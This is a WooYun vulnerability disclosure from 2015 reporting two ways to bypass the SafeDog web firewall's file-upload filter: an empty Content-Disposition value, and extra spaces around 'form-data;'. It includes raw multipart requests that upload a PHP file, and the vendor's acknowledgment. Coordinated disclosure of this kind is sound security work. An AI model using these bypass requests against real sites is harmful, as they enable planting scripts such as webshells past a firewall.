当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136073

漏洞标题:网站安全狗上传拦截bypass(两种姿势)

相关厂商:安全狗

漏洞作者: JoyChou

提交时间:2015-08-22 15:26

修复时间:2015-11-22 09:02

公开时间:2015-11-22 09:02

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向第三方安全合作伙伴开放
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

在第一弹中,我们可以通过大小写进行bypass。
那第二弹呢?

详细说明:

姿势一、
大家还记得之前在zone上,有人将form-data改为f+orm-data进行绕过的case吗?
所以google下Content-Disposition的value,发现有很多,每个都能上传成功,并且绕过。
http://www.iana.org/assignments/cont-disp/cont-disp.xhtml#cont-disp-1
最后,发现原来Content-Disposition的值可以为空。最后知道真相的我眼泪掉下来。

------WebKitFormBoundarysnXY4rAshTKCPSr1
Content-Disposition: name="file"; filename="bypass.php"
Content-Type: application/octet-stream
<?php  
echo 'bypass safedog upload ';
?>
------WebKitFormBoundarysnXY4rAshTKCPSr1


姿势二、
在Content-Disposition:后添加多个空格 或者
在form-data;后添加多个空格

------WebKitFormBoundarysnXY4rAshTKCPSr1
Content-Disposition: form-data;   name="file"; filename="bypass.php"
Content-Type: application/octet-stream
<?php  
echo 'bypass safedog upload ';
?>
------WebKitFormBoundarysnXY4rAshTKCPSr1

漏洞证明:

4.png


5.png


6.png


修复方案:

考虑综上情况

版权声明:转载请注明来源 JoyChou@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-08-24 09:01

厂商回复:

恩,没错,您的测试方向是对的,不过这个问题我们之前就已经知悉,将尽快进行修复。
然后也很感谢您的提交。

最新状态:

暂无